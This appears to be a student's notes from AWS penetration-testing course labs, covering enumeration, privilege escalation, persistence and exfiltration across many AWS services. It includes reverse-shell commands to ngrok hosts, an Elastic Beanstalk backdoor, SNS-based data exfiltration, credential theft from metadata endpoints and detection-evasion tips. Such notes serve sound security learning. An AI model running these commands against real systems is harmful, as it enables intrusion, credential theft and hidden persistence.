AWS Organization
=======================
If the management account is compromised, the whole infrastructure is compromised.
Never run workloads in it; use it only for billing and managing the organization.
OUs can contain other OUs and accounts.
An AWS account can only belong to one AWS Organization at a time.
The Management Account (the organization root) is not the same as the root user of each account. -- Will be explained later. MUST REMEMBER TO CHECK
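A minimal org-enumeration sketch (assuming the profile used has organizations read permissions):
aws organizations describe-organization   # org id + management account
aws organizations list-roots              # root OU id
aws organizations list-organizational-units-for-parent --parent-id <root-or-ou-id>
aws organizations list-accounts           # all member accounts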
AWS Principals
=====================
The MFA factor is lost when jumping between roles/accounts.
ppap principal
In AWS Identity and Access Management (IAM), roles have a trust policy that
specifies which entities (principals) are allowed to assume the role. The key
point: a principal does not always need an explicit sts:AssumeRole allow in its
own identity policy. If the trust policy names a same-account principal
directly (rather than just the account), the trust policy alone can permit the
assumption.
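A sketch of such a trust policy (account id, user and role names are hypothetical):
cat > trust.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::123456789012:user/some-user"},
    "Action": "sts:AssumeRole"
  }]
}
EOF
# some-user (same account) can assume the role without its own sts:AssumeRole allow:
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/some-role --role-session-name test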
iam - identity providers
be careful and restrictive when granting access to roles; there is a huge chance of misconfiguration
AWS IAM
============================
also check bf-aws-perms-simulate
cloudtrail2iam
tfstate2iam
Enumerate principals in other organizations/accounts
by adding candidate role or user ARNs as trusted principals in an assume-role trust policy:
nonexistent principals make the update fail, existing ones do not give an error.
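A sketch of the technique, assuming we control a role in our own account (enum-role and the candidate ARNs are hypothetical):
for arn in "arn:aws:iam::<target-account>:user/admin" "arn:aws:iam::<target-account>:role/terraform"; do
  # nonexistent principals make the update fail (MalformedPolicyDocument); existing ones succeed
  echo "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"$arn\"},\"Action\":\"sts:AssumeRole\"}]}" > trust.json
  aws iam update-assume-role-policy --role-name enum-role --policy-document file://trust.json && echo "EXISTS: $arn"
done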
persistence
don't create a new user if the company is using an identity provider; it will get caught instantly
arn:aws:iam::597766930741:policy/iam_lab_2_permission_boundary
STS
=========================
aws_consoler -- turn valid CLI credentials into a web console session
role juggling -- keep re-assuming roles to refresh temporary credentials (persistence); a sketch below
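A rough role-juggling sketch (role ARN is hypothetical; its trust policy must allow the current principal to keep assuming it):
ROLE="arn:aws:iam::<account-id>:role/jugglable-role"
while true; do
  CREDS=$(aws sts assume-role --role-arn "$ROLE" --role-session-name juggle --query Credentials --output json)
  export AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r .AccessKeyId)
  export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r .SecretAccessKey)
  export AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r .SessionToken)
  sleep 3000   # re-assume before the ~1h session expires
done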
KMS
====================
A ransomware attack is possible with customer managed keys: data can be re-encrypted with a key the attacker controls and the key then scheduled for deletion.
secrets manager
=====================
secrets access is heavily monitored
aws secretsmanager put-resource-policy --secret-id flag_secretsmanager_lab_1 --resource-policy file://sm.json
can only access a secret if we can read the secret (secretsmanager:GetSecretValue) as well as get the key from KMS (kms:Decrypt)
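A sketch of what sm.json could look like to share the secret with an external account (account id hypothetical):
cat > sm.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
    "Action": "secretsmanager:GetSecretValue",
    "Resource": "*"
  }]
}
EOF
The external principal still needs kms:Decrypt on the CMK for this to be useful.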
s3
=====================
external accounts can't overwrite resource policies even if given permission,
but they can overwrite ACLs
bucket-level actions require the resource name to be just the bucket ARN;
object-level statements in a bucket policy need the resource name as bucket_name/*
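Both resource forms in one illustrative bucket policy (bucket name hypothetical):
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket",
     "Resource": "arn:aws:s3:::example-bucket"},
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}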
cloud_enum
EC2
==============
mostly SGs are used over NACLs
NACLs are stateless and affect every packet; SGs are stateful and are only evaluated for new connections
userdata
use the script from cloud hacktricks to get the data for the instance using IMDS
/iam/info
/iam/security-credentials/
the EC2 identity credentials (/identity-credentials/ec2/) are there but cannot be used by us; the ones inside /iam are usable
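A manual IMDSv2 sketch (the role name comes from the first call):
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>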
LinPEAS can also do it
./linpeas.sh -o cloud
EC2-SSM -- check cloud hacktricks for more interesting stuff
aws ssm describe-instance-information
aws ssm describe-parameters
aws ssm send-command --instance-ids "instance id" --document-name "AWS-
RunShellScript" --output text --parameters commands="whoami && ps -ef | grep -i
ssm" -- run commands on instances managed by ssm
aws ssm get-command-invocation --command-id "copy this from the result of the above
command" --instance-id "<instance-id>" -- Get command results
Anyone can use public AMIs and EBS snapshots
AMIs and snapshots can be targeted by owner id
snapshots can also be downloaded and accessed locally in a docker container; more info at the hacktricks link for the ec2-privesc section
Security Group connection tracking persistence: already-established (tracked) connections keep working even after the allowing rule is removed
i-0343132f279a299eb
172.31.4.83
3.239.183.78
ec2-3-239-183-78.compute-1.amazonaws.com
i-09e6e6d95c7005a9f
172.31.4.7
3.236.174.15
ec2-3-236-174-15.compute-1.amazonaws.com
/bin/bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/19016 0>&1
aws ssm send-command --instance-ids "i-02a11a8f3d95c8126" --document-name "AWS-
RunShellScript" --output text --parameters commands="/bin/bash -i >&
/dev/tcp/2.tcp.eu.ngrok.io/17411 0>&1" --profile ec2_2
i-02a11a8f3d95c8126
curl http://169.254.169.254/latest/meta-data/instance-id
tcp://2.tcp.eu.ngrok.io:17411
aws secretsmanager get-secret-value --secret-id flag_ec2_lab_3 --region us-east-1
aws --profile ec2_3 ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-02a11a8f3d95c8126
aws ec2 disassociate-iam-instance-profile --association-id iip-assoc-014175eae5f3d2dd7
aws --profile ec2_3 ec2 associate-iam-instance-profile --instance-id i-02a11a8f3d95c8126 --iam-instance-profile Name=ec2_lab_3_secret_access_profile
aws --profile ec2_3 ec2 describe-snapshots --owner-ids 791397163361
aws --profile ec2_3 ec2 describe-snapshots --snapshot-id snap-00ef8467a60c91427
aws ec2 create-volume --snapshot-id snap-00ef8467a60c91427 --availability-zone us-east-1a --region us-east-1
vol-07f5a02fe62e1a2ee
i-07c92b8257420cd5e
aws ec2 attach-volume --volume-id vol-07f5a02fe62e1a2ee --instance-id i-07c92b8257420cd5e --device /dev/xvdb --region us-east-1
sudo mkdir /tmp/new-dir && sudo mount /dev/xvdb1 /tmp/new-dir
sudo cat /tmp/new-dir/root/flag.txt
aws --profile ec2_4 ec2 describe-security-groups --group-ids sg-0dcf05c39bf2c27c0
No inbound allowed
i-0343132f279a299eb -- mapped to instance id
aws ec2 authorize-security-group-ingress --group-id sg-0dcf05c39bf2c27c0 --protocol tcp --port 45380 --cidr 0.0.0.0/0
ec2-3-239-183-78.compute-1.amazonaws.com
http://ec2-3-239-183-78.compute-1.amazonaws.com:45380/fetch?url=http%3a%2f%2f169.254.169.254%2flatest%2fmeta-data%2fiam%2fsecurity-credentials%2fec2_lab_4_secret_access_role
aws --profile ec2_4_1 secretsmanager get-secret-value --secret-id flag_ec2_lab_4
LightSail
======================
Mini cloud provider inside AWS
Even has a separate web console
https://lightsail.aws.amazon.com
in practice most WordPress sites on AWS use Lightsail instead of EC2 because of its simplicity
Connect to the machine using the web console; the SSH key can also be downloaded from there. EC2 does not store the key.
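With CLI access the key can also be fetched directly (instance name hypothetical):
aws lightsail download-default-key-pair   # default SSH key pair for the region
aws lightsail get-instance-access-details --instance-name <instance-name>   # temporary SSH access details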
Lightsail instances do not have IAM roles
metadata endpoint
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Will have a role AmazonLightsailInstanceRole
http://169.254.169.254/latest/meta-data/iam/security-credentials/AmazonLightsailInstanceRole
This role belongs to AWS, not to us
http://169.254.169.254/latest/meta-data/iam/info
Enumerate
------------
# Instances
aws lightsail get-instances #Get all
aws lightsail get-instance-port-states --instance-name <instance_name> # Get open ports
# Databases
aws lightsail get-relational-databases
aws lightsail get-relational-database-snapshots
aws lightsail get-relational-database-parameters --relational-database-name <db name>
# Disk & snapshots
aws lightsail get-instance-snapshots
aws lightsail get-disk-snapshots
aws lightsail get-disks
# More
aws lightsail get-load-balancers
aws lightsail get-static-ips
aws lightsail get-key-pairs
aws lightsail get-buckets --bucket-name my-bucket --include-connected-resources/--no-include-connected-resources -- if no bucket is specified it returns all buckets
the DNS service is critical if compromised (Lightsail can host DNS zones)
LAMBDA
=============
can help in rotating secrets (An example)
/proc/self/environ -- path for IAM creds; Lambda does not have a meta-data endpoint
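A minimal sketch, assuming command execution inside the function:
cat /proc/self/environ | tr '\0' '\n' | grep ^AWS_
# or simply: env | grep ^AWS_   (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN)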
lambda aliases -- read again
the code of a Lambda is stored in /var/task -- useful if we get SSRF/LFI etc
Steal other users' Lambda URL requests -- read on cloud hacktricks
/var/runtime/bootstrap.py
/var/runtime/awslambdaric -- the new bootstrap is found here
this MitM attack can no longer be performed, as the Lambda runtime has been hardened
API GATEWAY
=========================
forbidden -- an API key is needed
check the API limits; useful if we want to exhaust them
get-usage-plan-keys
get-usage
the x-api-key header is needed
the resource policy must be checked as well
explicit deny error if blocked
if AWS IAM auth is enabled and credentials are missing:
{"message":"Missing Authentication Token"}
use Postman to sign the request with the credentials
Service name: execute-api
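curl (>= 7.75) can sign the request itself instead of Postman; a sketch with placeholder API id/stage:
curl --aws-sigv4 "aws:amz:us-east-1:execute-api" \
  --user "$AWS_ACCESS_KEY_ID:$AWS_SECRET_ACCESS_KEY" \
  -H "x-amz-security-token: $AWS_SESSION_TOKEN" \
  "https://<api-id>.execute-api.us-east-1.amazonaws.com/<stage>/<resource>"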
Custom Authentication
aws apigateway get-authorizers --rest-api-id <API ID>
e.g. in the example we invoke the Lambda MyLambdaAuth, and the request header is Authorization
Check the function for more details about the expected token value
EFS
====================================
sudo mkdir /efs
## Mount found
sudo apt install nfs-common
sudo mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport <IP>:/ /efs
## Mount with efs type
## You need to have installed the package amazon-efs-utils
sudo mount -t efs <file-system-id/EFS DNS name>:/ /efs/
Mount with IAM access
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/ /efs/
EFS Access points
sudo mount -t efs -o tls,accesspoint=fsap-id <file-system-id/EFS DNS name> /efs/
Enumeration
-----------------
# Get filesystems and access policies (if any)
aws efs describe-file-systems
aws efs describe-file-system-policy --file-system-id <id>
# Get subnetworks and IP addresses where you can find the file system
aws efs describe-mount-targets --file-system-id <id>
aws efs describe-mount-target-security-groups --mount-target-id <fsmt-id>
# Get other access points
aws efs describe-access-points
# Get replication configurations
aws efs describe-replication-configurations
# Search for NFS in EC2 networks, if the user does not have IAM permissions but can port scan
nmap -Pn -p 2049 --open 10.10.10.0/24
<fs-id>.efs.<region>.amazonaws.com
Access or create an EC2 instance in the same subnet as the EFS to mount it
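Putting it together from an instance in the same subnet (file system id hypothetical):
sudo mkdir -p /efs
sudo mount -t nfs4 -o nfsvers=4.1 fs-01234567.efs.us-east-1.amazonaws.com:/ /efs
ls -la /efs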
RDS
=================================================
no public access by default
Practically clusters are used more
More enumeration commands + techniques in cloud hacktricks
check for associated roles for db clusters / instances
psql --host=<host endpoint> --port=<Port> --username=<db username> --password
Check Abuse Roles from RDS on cloud hacktricks
SELECT datname FROM pg_database;
an rdsadmin db is created in RDS by default; good for fingerprinting if we compromise a DBMS using SQLi
extensions need to be installed to access AWS services from the DBMS,
e.g. for Postgres to work with S3 we need the aws_s3 extension
SELECT * FROM pg_extension;
Look for the complete S3 technique on cloud hacktricks
we need to know the exact bucket and object name so we can exfiltrate it
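A sketch of the S3 read primitive via psql, assuming the instance role can read the bucket (all names are placeholders):
psql --host=<host endpoint> --username=<db username> -c "CREATE EXTENSION IF NOT EXISTS aws_s3 CASCADE;"
psql --host=<host endpoint> --username=<db username> -c "CREATE TABLE loot (data text);"
psql --host=<host endpoint> --username=<db username> -c "SELECT aws_s3.table_import_from_s3('loot', '', '(format text)', '<bucket>', '<object-key>', '<region>');"
psql --host=<host endpoint> --username=<db username> -c "SELECT * FROM loot;"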
MYSQL
----------------
mysql -h host -u user -P port -p<password>
SELECT User, Host FROM mysql.user;
there will be a user called rdsadmin
show variables; -- may reveal the roles configured for the DBMS
DynamoDB
================================
AWS NoSQL DB
Will try to learn injection techniques
# Tables
aws dynamodb list-tables
aws dynamodb describe-table --table-name <t_name> #Get metadata info
aws dynamodb scan --table-name YOUR_TABLE_NAME # dump table content
## The primary key and sort key will appear inside the KeySchema field
# Check if point in time recovery is enabled
aws dynamodb describe-continuous-backups --table-name tablename
# Backups
aws dynamodb list-backups
aws dynamodb describe-backup --backup-arn <arn>
aws dynamodb describe-continuous-backups --table-name <t_name>
# Global tables (tables replicated in different regions for better availability)
aws dynamodb list-global-tables
aws dynamodb describe-global-table --global-table-name <name>
# Exports
aws dynamodb list-exports
aws dynamodb describe-export --export-arn <arn>
# Misc
aws dynamodb describe-endpoints #Dynamodb endpoints
No special privesc techniques, no IAM roles etc
SQL injection, NoSQL injection, raw JSON injection | :property injection
NoSQL injections are complicated to find for DynamoDB
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum#raw-json-injection
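An illustration of the raw JSON injection idea (hypothetical backend that concatenates user input into the condition):
# server-side filter: {"id": {"ComparisonOperator": "EQ", "AttributeValueList": [{"N": "<input>"}]}}
# input such as:  1"}], "ComparisonOperator": "NE
# flips the EQ condition to NE and dumps unintended items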
ECR
===================
find sensitive info, secrets, code etc
public.ecr.aws/random/name -- public registries
ECR Public always uses us-east-1
docker images
docker pull public.ecr.aws/random/name
aws ecr-public get-login-password authenticates a Docker client to an Amazon ECR Public registry: it retrieves a base64 token that is piped into docker login.
aws ecr-public get-login-password --region <region> | docker login --username AWS --password-stdin <registry-url>
Inside the downloaded repo folder
docker build -t <repo name> .
docker push public.ecr.aws/random/repo:<image tag>
set an image tag value, e.g. latest
docker pull <private repo> -- download a private image
we need to log in before we can pull the image:
aws ecr get-login-password --region <region> | docker login --username AWS --password-stdin <registry-url>
docker images -- check downloaded images
Use hacktricks docker forensics to extract sensitive data from the images
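A quick offline grep over an exported image (tar layout varies by Docker version):
docker save <image>:<tag> -o img.tar
mkdir img && tar -xf img.tar -C img
# layers are tars themselves: layer.tar in the legacy layout, blobs/sha256/* in the OCI layout
for l in img/*/layer.tar img/blobs/sha256/*; do
  tar -tf "$l" 2>/dev/null | grep -Ei "\.env|credential|secret|id_rsa"
done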
docker build -t <repo name> .
docker tag creates a tag (label) for an existing image, assigning it a new name so it can be referenced and pushed to a registry:
docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]
docker tag repo:latest private_repo_url:latest
docker push private_repo_url:latest
ECS
==============================
3 infrastructure options:
Fargate
EC2
external instances using ECS Anywhere (connect your on-prem containers to ECS)
Env variables are interesting in tasks
Task definition will specify the container which we want to run
# Clusters info
aws ecs list-clusters
aws ecs describe-clusters --clusters <cluster>
# Container instances
## An Amazon ECS container instance is an Amazon EC2 instance that is running the
## Amazon ECS container agent and has been registered into an Amazon ECS cluster.
aws ecs list-container-instances
aws ecs describe-container-instances
# Services info
aws ecs list-services --cluster <cluster>
aws ecs describe-services --cluster <cluster> --services <services>
aws ecs describe-task-sets --cluster <cluster> --service <service>
# Task definitions
aws ecs list-task-definition-families
aws ecs list-task-definitions
aws ecs list-tasks --cluster <cluster>
aws ecs describe-tasks --cluster <cluster> --tasks <tasks>
## Look for env vars and secrets used from the task definition
aws ecs describe-task-definition --task-definition <TASK_NAME>:<VERSION>
DEMO
aws ecs list-clusters
aws ecs describe-clusters --clusters <cluster-name>
aws ecs list-container-instances --cluster <cluster-name>
aws ecs describe-container-instances --cluster <cluster-name> --container-instances <container-instance-arn>
aws ecs list-services --cluster <cluster-name>
aws ecs describe-services --cluster <cluster-name> --services <services arn>
see the tasks, vpc info, roles
aws ecs list-tasks --cluster <cluster-name>
aws ecs describe-tasks --cluster <cluster-name> --tasks <task arn>
see the container instance ARN, container ARN, roles
we must enumerate the EC2 to find VPC-level info, roles, policies etc
if a container is compromised, access the credentials endpoint (see below)
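From inside a task container the creds come from the task credentials endpoint, not IMDS:
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
curl "$ECS_CONTAINER_METADATA_URI_V4/task"   # task metadata (v4)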
let's suppose we compromise the EC2
docker ps
docker exec -it <container id> bash -- access the container of interest
e.g. we are inside wordpress container
ls
check sensitive info etc
use linpeas
./linpeas.sh -o cloud
get the iam creds
check the user-data
check for the ssm-agent -- ps -ef
Elastic Beanstalk
=================================
# Find S3 bucket
ACCOUNT_NUMBER=<account_number>
for r in us-east-1 us-east-2 us-west-1 us-west-2 ap-south-1 ap-south-2 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-southeast-1 ap-southeast-2 ap-southeast-3 ca-central-1 eu-central-1 eu-central-2 eu-west-1 eu-west-2 eu-west-3 eu-north-1 sa-east-1 af-south-1 ap-east-1 eu-south-1 eu-south-2 me-south-1 me-central-1; do
  aws s3 ls elasticbeanstalk-$r-$ACCOUNT_NUMBER 2>/dev/null && echo "Found in: elasticbeanstalk-$r-$ACCOUNT_NUMBER"
done
# Get apps and URLs
aws elasticbeanstalk describe-applications # List apps
aws elasticbeanstalk describe-application-versions # Get apps & bucket name with source code
aws elasticbeanstalk describe-environments # List envs
aws elasticbeanstalk describe-environments | grep -E "EndpointURL|CNAME"
aws elasticbeanstalk describe-environment-resources --environment-name <name>
# Get events
aws elasticbeanstalk describe-events
DEMO
aws elasticbeanstalk describe-applications
aws elasticbeanstalk describe-application-versions
Check the version, s3 bucket and key names
aws elasticbeanstalk describe-environments
Check the environment id, solution stack name, EndpointURL, CNAME
aws elasticbeanstalk describe-environment-resources --environment-name <ENV Name>
check instance id, launch configuration, autoscaling groups
The launch config will have the attached roles, SGs, AMI, user-data etc
Some things are also stored directly in the EC2 instance
aws elasticbeanstalk describe-configuration-settings --application-name <app name> --environment-name <env name>
check the config settings
Inside the EC2
sudo su
cd /opt/elasticbeanstalk
cd proc/<process id>
cat /etc/nginx/nginx.conf
Also get meta-data using the URL or linpeas.sh -o cloud
docker ps -- for apps in container
docker exec -it <id> bash
S3 attack to rebuild the code (see the sketch after these steps)
download the existing code
nano application.py
add some rev shell code
rezip the code
aws s3 cp file.zip s3://elasticbeanstalk-region-accountid/file.zip
aws elasticbeanstalk rebuild-environment --environment-name <env name>
rebuild the environment
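The whole flow as a sketch (bucket/key/env names are placeholders; the appended line is an example backdoor for a Python app):
aws s3 cp s3://elasticbeanstalk-<region>-<account-id>/<key>.zip app.zip
unzip app.zip -d app && cd app
echo 'import os; os.system("bash -c \"bash -i >& /dev/tcp/<attacker>/4444 0>&1 &\"")' >> application.py
zip -r ../app.zip . && cd ..
aws s3 cp app.zip s3://elasticbeanstalk-<region>-<account-id>/<key>.zip
aws elasticbeanstalk rebuild-environment --environment-name <env-name>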
CodeBuild
=============================
interesting for pivoting to other platforms
# List external repo creds (such as github tokens)
## It doesn't return the token but just the ARN where it's located
aws codebuild list-source-credentials
# Projects
aws codebuild list-shared-projects
aws codebuild list-projects
aws codebuild batch-get-projects --names <project_name> # Check for creds in env vars
# Builds
aws codebuild list-builds
aws codebuild list-builds-for-project --project-name <p_name>
aws codebuild list-build-batches
aws codebuild list-build-batches-for-project --project-name <p_name>
aws codebuild batch-get-builds --ids <build_id>
aws --profile cb_3 codebuild batch-get-build-batches --ids <batch_build_id>
# Reports
aws codebuild list-reports
aws codebuild describe-test-cases --report-arn <ARN>
SNS
=================================================
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>
aws sns get-topic-attributes --topic-arn <topic arn>
VIA Email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com
Exfiltrate using HTTP
aws sns subscribe --region <region>\
--protocol <http/https> \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt
FIFO topics can only be exfiltrated via SQS (they only deliver to SQS subscriptions)
Access can be granted to only the owner, to other AWS accounts, or to all AWS accounts
A service role can be given as well; the role itself cannot be compromised
subscribers will receive the published messages
Subscriptions must be confirmed
when subscribing and publishing make sure to specify --region, otherwise we get an error
COGNITO
=====================================
identity pool roles can be allocated for both authenticated and unauthenticated
users.
pool id can be leaked in source code etc.
Must check both authentication flows.
For user pools, self-registration could be enabled. Even if it is not shown in the
app, users can check directly with the AWS Cognito APIs
By default a user can read and write the values of almost all of their attributes; if there is a custom attribute e.g. isAdmin, the user may be able to change it from false to true (see the sketch below)
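A sketch of flipping such an attribute with the user's own access token (the custom:isAdmin name is hypothetical):
aws cognito-idp update-user-attributes --access-token <access-token> \
  --user-attributes Name=custom:isAdmin,Value=true --region <region> --no-sign-request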
# List Identity Pools
aws cognito-identity list-identity-pools --max-results 60
aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
aws cognito-identity list-identities --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" --max-results 60
aws cognito-identity get-identity-pool-roles --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
# User Pools
## Get pools
aws cognito-idp list-user-pools --max-results 60
## Get users
aws cognito-idp list-users --user-pool-id <user-pool-id>
## Get groups
aws cognito-idp list-groups --user-pool-id <user-pool-id>
## Get users in a group
aws cognito-idp list-users-in-group --user-pool-id <user-pool-id> --group-name <group-name>
## List App IDs of a user pool
aws cognito-idp list-user-pool-clients --user-pool-id <user-pool-id>
## List configured identity providers for a user pool
aws cognito-idp list-identity-providers --user-pool-id <user-pool-id>
## List user import jobs
aws cognito-idp list-user-import-jobs --user-pool-id <user-pool-id> --max-results 60
## Get MFA config of a user pool
aws cognito-idp get-user-pool-mfa-config --user-pool-id <user-pool-id>
## Get risk configuration
aws cognito-idp describe-risk-configuration --user-pool-id <user-pool-id>
DEMO
-------------
try to fuzz; we get an error; searching online points to Cognito
the request hits a Cognito endpoint
we send the params: AuthFlow USER_PASSWORD_AUTH, ClientId, and user and pass
a successful login triggers a request to a Lambda function
try to access the API Lambda directly
we get unauthorized
default creds don't work
Let's see if sign-up is allowed, as we have the client id:
aws cognito-idp sign-up --client-id <client-id> --username <username> --password <password> --user-attributes Name=email,Value=test@test.com --region <region> --no-sign-request
We will get a confirmation code
aws cognito-idp confirm-sign-up --client-id <client-id> --username <user> --confirmation-code <code> --no-sign-request --region <region>
Let us login to the site again
We now get a result from the Lambda; it points to a Lambda function getSecretFlag
if the user has any groups, we can find them in the base64-decoded values of the login access token
we need to find the identity pool id
in the config param for the API gateway we can use the value /etc/passwd; remember to send the bearer token in the Authorization header
We can also login using CLI as
aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id <client-id> --region <region> --auth-parameters USERNAME=<user>,PASSWORD=<pass>
we can see the access token and id token
use the idtoken with curl as the bearer token value
in a lambda we can also use /proc/self/environ to leak role creds
Saved the creds as below
[profile]
aws_access_key_id = value
aws_secret_access_key = value
aws_session_token = value
region = us-east-1
aws --profile <profile> sts get-caller-identity
the role was useless, so let's leak the Lambda source code; it is in /var/task/lambda_function.py (we can also reference lambda_function.py directly, since the code runs from that directory)
in the code we will find the identity pool id
let us get an id from the identity pool
aws cognito-identity get-id --region <region> --identity-pool-id <pool id> --logins <cognito URL from the token>=<id-token>
We will get an identity id in the output
Now after getting the identity id, we will get the creds for the id
aws cognito-identity get-credentials-for-identity --region <region> --identity-id <identity id> --logins <cognito URL from the token>=<id-token>
Save these creds as another profile (same format as above)
aws --profile <profile> sts get-caller-identity
Then we can list secrets and get the secret value
UNAUTH IDENTITY ID & CREDS
aws cognito-identity get-id --identity-pool-id <pool id> --no-sign-request
aws cognito-identity get-credentials-for-identity --identity-id <identity id> --no-sign-request
Check cloud hacktricks to read on more priv esc techniques
WHITEBOX METHODOLOGY
==============================
arn:aws:iam::aws:policy/ReadOnlyAccess
Want to check:
Benchmark checks
Services Enumeration
Exposed assets
IAM permissions
Integrations
Check for false positives, do manual checks, don't always rely on automated scans
Check for wildcard and unnecessary permissions for the user
How external users can access AWS services
Cloud hacktricks explains the 5 steps
Benchmark check tools
https://github.com/turbot/steampipe-mod-aws-compliance
https://github.com/turbot/steampipe-mod-aws-insights
https://github.com/aquasecurity/cloudsploit
https://github.com/prowler-cloud/prowler
https://github.com/BishopFox/cloudfox
https://github.com/nccgroup/ScoutSuite
Purplepanda
aws-recon
cloudlist
cloudmapper
pacu
pmapper
Check the billing section to see which services the company is paying for, and in which regions
exposed assets
https://github.com/turbot/steampipe-mod-aws-perimeter
https://github.com/turbot/steampipe-mod-aws-insights
IAM Permissions
https://github.com/carlospolop/aws_sensitive_permissions
https://github.com/duo-labs/cloudmapper
https://github.com/nccgroup/PMapper
https://github.com/salesforce/cloudsplaining
DEMOS of tools
prowler
prowler -p profile_name
cloudsploit
./index.js --console=table --config ./config.js
https://github.com/turbot/steampipe-mod-aws-insights
https://github.com/turbot/steampipe-mod-aws-perimeter
steampipe dashboard
Cloudfox
./cloudfox aws --profile profile_name all-checks
Can also run cloudfox per service
it can also enhance its output with data from pmapper
https://github.com/carlospolop/aws_sensitive_permissions
openai <api-key>
aws_find_external_accounts
BLACKBOX
=========================================
Company Info
emails
linkedin profiles
domains
IPs
AWS account IDs
git leaks
look for stuff in buckets and look inside each file
Search for Identity Pool ids in github:
/us-east-1:[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/
Once found we can try get-id using an unauthenticated request
Then use get-credentials-for-identity to get an IAM role inside AWS
the unauth identity gets fewer permissions than the authenticated role,
and only access to a limited set of 14 services is allowed
we can also try to authenticate via the basic flow if it is enabled (disabled by default)
first use get-id again to get an identity id
aws cognito-identity get-open-id-token --identity-id "<id>" --no-sign-request --region <region>
we get a base64 token
aws sts assume-role-with-web-identity --role-arn <role from the previous flow> --role-session-name <session-name> --web-identity-token <base64 token> --region <region>
now we can perform the actions that were limited previously
Now we move to internal enumeration
Web Console
AWS cli
Steampipe
  https://github.com/turbot/steampipe-mod-aws-perimeter
  https://github.com/turbot/steampipe-mod-aws-insights
CloudSploit
Cloudfox
Prowler doesn't work without access to generate a credential report
Current privileges BF:
  https://github.com/carlospolop/bf-aws-permissions
  https://github.com/carlospolop/bf-aws-perms-simulate
  https://github.com/carlospolop/aws-Perms2ManagedPolicies
  https://github.com/carlospolop/tfstate2IAM
  https://github.com/carlospolop/Cloudtrail2IAM
  https://github.com/carnal0wnage/weirdAAL
  https://github.com/andresriancho/enumerate-iam
Perform manual enumeration first, then move to automated if you find nothing.
Since most users cannot enumerate their permissions, we will need to brute-force
the possible permissions
https://github.com/carnal0wnage/weirdAAL
This is good
https://github.com/carlospolop/bf-aws-permissions -- good but noisy; only covers list, describe and get permissions
https://github.com/carlospolop/bf-aws-perms-simulate
A little stealthier, but it needs the simulate permission
https://github.com/carlospolop/aws-Perms2ManagedPolicies -- based on the permissions found, it shows which AWS managed policies we have
PACU
./bf-aws-permissions.sh -p profile -r region -s "iam|sts|kms|secretsmanager|s3|ec2|lightsail|lambda|apigateway|apigatewayv2|efs|rds|dynamodb|ecr|ecs|elasticbeanstalk|codebuild|sqs|sns|cognito-idp"
717727228533.dkr.ecr.us-east-1.amazonaws.com/blackbox_lab_2@sha256:56a32074b77a984ade279ac44bf4709f9487e932ad06e3b4280eed2aa91317e2
try to see if we can create access keys for users
aws iam create-access-key --user-name "admin"
max 2 per user
now we can try to enumerate permissions for the new user.
cyclic process
check groups, role and policies attached to our users
list inline and attached policies
check the policy versions and whether we can set the default version; a previous version might grant more privileges
aws organizations list-accounts
check accounts in our AWS organizations
we can see if we have any children accounts
by default the management account has admin privileges on child accounts via the OrganizationAccountAccessRole
follow cloud hacktricks
aws sts assume-role --role-arn <OrganizationAccountAccessRole ARN in the child account> --role-session-name sessionname
we can see the attached policies for this role, it will be admin
Post-Expl
----------
web console -- aws_consoler
confused deputy
instances, snapshots, containers
EKS clusters
codebuild
BlackBox DEMO 2
Start with the bucket URL
there is a file called credentials.txt
file will not be accessible
let's try using any AWS account to see if the file can be downloaded
for no auth we can use --no-sign-request
aws s3 cp <bucket url + key> .
try to get-bucket-policy
we will also get denied
get-bucket-acl
get-object-acl
AllUsers has WRITE_ACP (Write Access Control Policy) permission on the object, so we can use it to grant ourselves read access
we use put-object-acl with --grant-read for all users:
uri=http://acs.amazonaws.com/groups/global/AllUsers
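The grant as a command (drop --no-sign-request if WRITE_ACP was only granted to AuthenticatedUsers):
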